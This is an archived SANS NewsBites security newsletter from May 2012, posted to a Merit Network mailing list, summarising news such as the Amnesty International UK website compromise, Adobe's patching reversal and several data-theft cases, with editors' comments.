Merit Network
Can't find what you're looking for? Search the Mail Archives.
  About Merit   Services   Network   Resources & Support   Network Research   News   Events   Home

Discussion Communities: Merit Network Email List Archives

NETSEC Archives

Date Prev | Date Next | Date Index | Author Index | Historical [Netsec] SANS NewsBites Vol. 14 Num. 39 : Pentagon To Share Cyber Security Information with Defense Contractors; Amnesty International UK Delivers Malware; Adobe Changes Mind on Handling Vulnerabilities After Backlash

  • From: The SANS Institute
  • Date: Tue May 15 15:12:18 2012

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


**************************************************************************
SANS NewsBites                 May 15, 2012              Vol. 14, Num. 039
**************************************************************************
TOP OF THE NEWS
 Pentagon To Share Cyber Security Information with Defense Contractors
 Amnesty International UK Hijacked to Share Malware
 Adobe Changes Mind on Handling Vulnerabilities After User Backlash
THE REST OF The WEEK'S NEWS
   Man Pleads Guilty to US $1.3 Million Phishing Scam
   Payroll Data for 700,000 People Goes Missing in Mail
   New Secure TLD Proposed  
   Undercover Investigation in UK Uncovers Trading in Personal Data
   47 Arrested in Carding Ring
   Dutch ISPs Ordered by Court To Block Pirate Bay
   Israeli Authorities Charge 6 People for Massive Data Theft

************************  SPONSORED BY Quest Software ***********************

Ask the Expert Webcast: Privileged Account Management: Enabling Secure Outsourcing and Cloud
Featuring: Dave Shackelford, Jason Fehrenbach and Marc Potter Sponsored
by Quest Software. Tuesday, May 22, 2012 at 1:00 PM EDT
http://www.sans.org/info/105140
**************************************************************************

TRAINING UPDATE
- --SANS Rocky Mountain 2012, Denver, CO  June 4-9, 2012
10 courses. Bonus evening presentations include Adjusting Our Defenses
for 2012; and Why Do Organizations Get Compromised?
http://www.sans.org/rocky-mountain-2012/
- --Forensics & Incident Response Summit & Training, Austin, TX June 20-27, 2012
Pre-Summit Courses: June 20-25, 2012; Summit: June 26-27, 2012
Techniques and solutions to aid organizations and agencies responding
to crimes and attacks.  Maximize your training by also attending one or
more of the 4 pre-summit courses.
http://www.sans.org/forensics-incident-response-summit-2012/
- --SANS Canberra 2012, Canberra, Australia   July 2-10, 2012
5 courses.
http://www.sans.org/canberra-2012/
- --Security Impact of IPv6 Summit, Washington, DC July 6, 2012
Walk away with best practices from some who have already implemented
IPv6, in large networks, for a few years.
http://www.sans.org/ipv6-summit-2012/
- --SANSFIRE 2012, Washington, DC   July 6-15, 2012
44 courses. Bonus evening presentations include Authentication Issues
Between Entities During Protocol Message Exchange in SCADA Systems;
Critical Infrastructure Control Systems Cybersecurity; and Why Don't We
Consider Our Cars Critical Infrastructure?
http://www.sans.org/sansfire-2012/
- - - --Looking for training in your own community?
http: sans.org/community/ Save on On-Demand training (30 full
courses) - See samples at
http://www.sans.org/ondemand/discounts.php#current
Plus Johannesburg, Atlanta, Brisbane, Jakarta, Boston, New York, and
Malaysia all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

********************************************************************

TOP OF THE NEWS
 --Pentagon To Share Cyber Security Information with Defense Contractors
(14th May 2012)
The US government is to expand a cyber security sharing initiative to
include up to 1,000 defense contractors.  The program has been running
successfully in a pilot scheme with 36 contractors and 3 large Internet
Service Providers.   According to Eric Rosenbach, deputy assistant
secretary of defense for cyberpolicy, the Pentagon approved expanding
the program to include all defense contractors and ISPs with security
clearances, "This is an important milestone in voluntary
information-sharing between government and industry," he said.   The
Pentagon will share both classified and unclassified information on
cybersecurity threats and countermeasures via a secure portal called
DIBnet.  If the expanded program continues to be successful it may be
expanded to include companies in other areas responsible for critical
infrastructure.
http://www.washingtonpost.com/politics/pentagon-expands-cybersecurity-exchange/2012/05/13/gIQAwPyQOU_story.html
http://www.nextgov.com/defense/2012/05/pentagon-opens-classified-cyber-program-all-defense-contractors-isps/55707/
[Editor's Note (Murray): Note that no legislation is required.  This is
the right way to approach the so-called "information sharing"
(intelligence sharing) issue. The contractors can provide data, the
government can distill intelligence and feed it back.  Accountability
is preserved.  No immunization required. That said, what the contractors
can expect to see is conclusions, not raw data, not the other guy's
data.
(Liston): Information sharing is the single, lowest-cost "technology"
we can adopt that will make us better defenders.  I sincerely hope that
this program succeeds and is expanded.]

 --Amnesty International UK Hijacked to Share Malware
(11th May 2012)
For two days in May the UK website for Amnesty International was
breached and used by the attackers to infect unsuspecting visitors to
the site with the Ghost RAT Trojan.  Malicious Java code was exploiting
the CVE-2012-0507 Java vulnerability was planted onto the website.
Between the 7th and 9th of May any visitors to the website using an
unpatched browser were at risk of downloading the malware onto their PC.
The Ghost RAT Trojan is the malware used in a number of attacks against
various organizations, such as the 'Nitro' attacks against energy firms
in 2011.
http://www.theregister.co.uk/2012/05/11/amnesty_malware_rat/
http://www.v3.co.uk/v3-uk/news/2174171/cyber-criminals-infect-amnesty-website-spread-trojan
http://www.zdnet.co.uk/blogs/communication-breakdown-10000030/amnesty-websites-compromised-in-gh0st-rat-attack-10026160/
http://www.techcentral.ie/18917/amnesty-uk-website-hacked-to-serve-lethal-gh0st-rat-trojan
[Editor's Note (Liston): (Liston): How do these people sleep at night?
What do they tell their families that they do for a living?  "Honey, I'm
home... It was long day at work, but I finally compromised Amnesty
International and planted some exploits... My boss is pretty pleased --
I may get a promotion!"]

 --Adobe Changes Mind on Handling Vulnerabilities After User Backlash
(12th May 2012)
Adobe has come under fire for initially suggesting that customers pay
to upgrade their software to obtain patches against security
vulnerabilities.   User of Adobe's Creative Suite 5.5 and 5.0 were told
by Adobe that they would have to pay US $ 375 to upgrade to version 6.0
of the software or to "follow security best practices and exercise
caution when opening files from unknown or untrusted sources." But
following angry feedback from customers, and commentary from security
experts , Adobe changed their stance, "We are in the process of
resolving the vulnerabilities addressed in these security bulletins in
Adobe Illustrator CS5.x, Adobe Photoshop CS5.x and Adobe Flash
Professional CS5.x, and will update the respective security bulletins
once the patches are available."  There is no indication yet as to when
those patches will be available.
http://www.v3.co.uk/v3-uk/news/2174307/adobe-criticised-handling-security-flaws
http://www.zdnet.co.uk/news/security-threats/2012/05/14/adobe-changes-course-and-patches-photoshop-for-free-40155215/
http://net-security.org/secworld.php?id=12920
[Editor's Note (Pescatore): A bad original decision by Adobe is not
fully rectified by the current public statements. What will Adobe's
long-term policy be on patching critical vulnerability in older
products? It would be nice to see that Adobe's software development
process was improved to result in many, many fewer vulnerabilities in
v6 releases but still need enterprise-level patching for older versions
for a reasonable amount of time.
(Murray): If a vendor could get customers to agree to pay for fixes,
there would be a perverse incentive to ship bad code.
(Liston): Wait... what?!?!  How is Adobe going to be able to generate
the revenue required to continue cranking out the top-notch,
consistently bug-free, software gems for which they're known (i.e.
Flash, Acrobat, Reader, etc...) if they aren't allowed to "gently"
squeeze their customers into upgrading by not patching older versions
of their software?!?! ]

*************************** Sponsored Link:  **************************
1) SANS Analyst Webcast, Streamline Risk Management: Automating the SANS
20 Critical Controls, June 14, 1 PM EDT
http://www.sans.org/info/105145
************************************************************************

THE REST OF THE WEEK'S NEWS
 --Man Pleads Guilty to US $1.3 Million Phishing Scam
(8th May 2012)
A 31 year old US man from Atlanta, Georgia, pleaded guilty to his part
in a phishing ring responsible for defrauding people of over US $1.3
million.  Waya Nwaki, also known as "Shawn Conley," "USAprince12k," and
"Prince Abuja", pleaded guilty to charges of wire fraud conspiracy, wire
fraud, aggravated identity theft and computer fraud conspiracy.  He
could face up to 47 years in prison and a fine of US $ 250,000 for each
count.  Sentencing is to take place on August 15th 2012.  According to
the indictment filed with the U.S. District Court in New Jersey, Nwaki
was part of an international gang of fraudsters with others named in the
scheme as Karlis Karklins of Latvia; Charles Umeh Chidi of the United
Kingdom; Alphonsus Osuala and Osarhieme Uyi Obaygbona of Atlanta; Marvin
Dion Hill of College Park, Ga.; and Olani Yi Jones of Nigeria.
http://www.govinfosecurity.com/phisher-guilty-13-million-scam-a-4742
http://www.msnbc.msn.com/id/47342263/ns/technology_and_science-security/t/georgia-man-admits-role-million-global-cyberscam/

 --Payroll Data for 700,000 People Goes Missing in Mail
(12th May 2012)
The personal details of over 700,000 people involved in California's
In-Home Supportive Services are reported to have gone missing in the
mail.  Hewlett Packard, which manages the payroll data for the workers
in California's In-Home Supportive Services, sent the data in microfiche
format via the U.S. Postal Service but the package containing the data
arrived at its destination damaged and incomplete.    The information
contained in the package related to the workers and also the elderly and
disabled clients of the service.  The information that may have been
compromised includes names, Social Security numbers and salary details
dating from October to December 2011.  Oscar Ramirez, a spokesman for
the California Department of Social Services said that "The state has
opened an internal investigation and notified law enforcement. Notices
will be sent to everyone who may be affected, and officials are
reviewing policies to prevent future problems."
http://articles.latimes.com/2012/may/12/local/la-me-0513-homecare-workers-20120513 
http://arstechnica.com/security/2012/05/ca-social-services-office-looses-hundreds-of-thousands-of-recordson-microfiche
http://www.scmagazine.com/data-on-700k-california-home-care-workers-recipients-lost/article/241124/

 --New Secure TLD Proposed  
(11th May 2012)
A new top level domain (TLD) is being proposed to the Internet
Corporation for Assigned Names and Numbers (ICANN) as a secure
alternative to existing domain name spaces.  The ".secure" domain will
be aimed at those organizations requiring a high level of trust and
security of their websites, such as banks and financial institutions.
The proposal is that organizations successfully registering a site
within the ".secure" domain space would need to undergo a thorough
background check and also adhere to a number of strict security
requirements such as end-to-end encryption and regular scanning of sites
for vulnerabilities and malware.  Any sites not adhering to the security
policies would be disconnected.  ICANN is currently reviewing
submissions for new TLDs and is expected to publish its results over the
coming weeks.
http://www.timesofoman.com/innercat.asp?detail=4760
http://www.wired.com/threatlevel/2012/05/dot-secure
http://gcn.com/articles/2012/05/11/dot-secure-domain-would-enforce-rigorous-security.aspx
[Editor's Note (Pescatore): This is unlikely to have any meaningful
impact, as there is no single definition of "secure."
(Murray): Of course, this is what we are entitled to get from SSL
certificates.  Is there any reason to believe that this domain
administrator would do a better job than Verisign? They make money for
issuing credentials, not denying them.]

 --Undercover Investigation in UK Uncovers Trading in Personal Data
(12th May 2012)
An investigation within the UK conducted by the Channel 4 TV station's
Dispatches program alleges that private investigators are paying for
access to personal details of individuals held in government databases.
The program shows how a private investigation firm sold sensitive data
of individuals such as bank account details, social welfare benefit
claims and medical details.  The program highlights that up to five
members of staff a day are disciplined for data offences at the
Department of Work and Pensions.  Under the UK's Data Protection Act,
specifically section 55, it is a criminal offence to: "obtain or
disclose personal data" without permission or "procure the disclosure
to another person".  The report has led to calls for more regulation
into the private investigations industry.
http://www.guardian.co.uk/technology/2012/may/12/trade-personal-data-secret-investigation
http://www.channel4.com/info/press/news/five-staff-a-day-disciplined-for-data-offences-at-the-dwp
[Editor's Note (Murray): While US private investigators do not advertise
their methods, they do promise that data.  These are exactly the
services that HP hired.  One role of the PI relationship is to protect
the principal from the methods of the investigator.]

 --47 Arrested in Carding Ring
(11th May 2012)
The Royal Canadian Mounted Police arrested 47 people in a number of
raids in Montreal and Ontario in a crackdown on a well-organized
international bank card ring responsible for stealing US $ 7 million and
potentially hundreds of millions more.  The gang installed skimming
devices on ATMs and modified POS terminals so that card data could be
gathered remotely.  In one attack lasting just 5 minutes police claim
the thieves made 203 transactions using 79 fraudulent cards at 23
different bank machines netting them US $ 30,000. According to Royal
Canadian Mounted Police Sargent  Yves Leblanc "This went on once, twice,
three times a day. It went on maybe four or five times a week."   The
gang had accomplices in Vancouver, Australia, New Zealand, Malaysia,
Tunisia and England.  The arrests are the result of an investigation
that began in 2008.
http://net-security.org/secworld.php?id=12913
http://www.wired.com/threatlevel/2012/05/mounties-bust-carders/

 --Dutch ISPs Ordered by Court To Block Pirate Bay
(11th May 2012)
In The Nederlands a Dutch court has issued an order to 5 of the
country's ISPs to block access to the Pirate Bay file-sharing service.
In addition, the Court of The Hague has forbidden the Dutch Pirate Party
from informing the public on how to circumventing the blocking
mechanisms or providing any proxy services to bypass the filters.  In
response the Pirate Party claims the court is censoring the Internet.
"This is a slap in the face for the free internet and a novel judicial
decision. The judge decided to give the Netherlands another nudge on the
sliding scale of censorship," said a Pirate Party spokesman. In January
of this year a separate court order required 2 separate ISPs to block
access to Pirate Bay. The Pirate Party operated a proxy service which
allowed clients of those ISPs to bypass the filters.
http://www.v3.co.uk/v3-uk/news/2174066/dutch-court-isps-block-pirate-bay
http://www.zdnet.co.uk/blogs/communication-breakdown-10000030/court-bans-dutch-party-from-helping-pirate-bay-10026156/

 --Israeli Authorities Charge 6 People for Massive Data Theft
(13th May 2012)
The district attorney for Tel Aviv, Israel, has charged 6 people for
their involvement in a massive data theft of the country's population
database and exposing the details of up to 9 million people.  The
indictment lists 55-year-old Shalom Bilik, a former contractor of the
Welfare and Social Services Ministry, and alleges that while working at
the ministry he made copies of the population registry database and sold
it.  Others included in the indictment are also accused of selling the
data to third parties. In a separate charge, Bilik is also accused of
copying databases containing the personal information regarding children
up for adoption and their biological parents. The district attorney has
requested that the trial be held in a closed court and a gag order
imposed on the defendants' testimony so that details of the Interior
Ministry's databases and database security can be kept secret to avoid
any further data breaches.
http://www.jpost.com/NationalNews/Article.aspx?id=269728


************************************************************************
The Editorial Board of SANS NewsBites

John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.

Stephen Northcutt founded the GIAC certification and is President of
STI, The Premier Skills-Based Cyber Security Graduate School,
www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center and Dean of the Faculty of the graduate school at the SANS
Technology Institute.

Ed Skoudis is co-founder of CounterHackChallenges, the nation's top
producer of cyber ranges, simulations, and competitive challenges, now
used from high schools to the Air Force. He is also author and lead
instructor of the SANS Hacker Exploits and Incident Handling course, and
Penetration Testing course..

William Hugh Murray is an executive consultant and trainer in
Information Assurance and Associate Professor at the Naval Postgraduate
School.

Rob Lee is the curriculum lead instructor for the SANS Institute's
computer forensic courses (computer-forensics.sans.org) and a Director
at the incident response company Mandiant.

Rohit Dhamankar is a security professional currently involved in
independent security research.

Tom Liston is a Senior Security Consultant and Malware Analyst for
InGuardians, a handler for the SANS Institute's Internet Storm Center,
and co-author of the book Counter Hack Reloaded.

Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a founder with Secure Anchor Consulting.

Ron Dick directed the National Infrastructure Protection Center (NIPC)
at the FBI and served as President of the InfraGard National
Members Alliance - with more than 22,000 members.

Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa).  He is leading SANS' global initiative to improve
application security.

David Hoelzer is the director of research & principal examiner for
Enclave Forensics and a senior fellow with the SANS Technology
Institute.

Alan Paller is director of research at the SANS Institute.

Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.

Clint Kreitner is the founding President and CEO of The Center for
Internet Security.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS infrastructure manager and serves as production
manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)
Comment: GPGTools - http://gpgtools.org

iEYEARECAAYFAk+yngkACgkQ+LUG5KFpTkYZ7QCgkBCp0UBUPv8UOPk2SX/RqvhZ
3G0AoI+7Z9dd79Gs1PNyQ1jUOPVEfCnc
=1SOe
-----END PGP SIGNATURE-----



Discussion Communities


About Merit | Services | Network | Resources & Support | Network Research
News | Events | Contact | Site Map | Merit Network Home


Merit Network, Inc.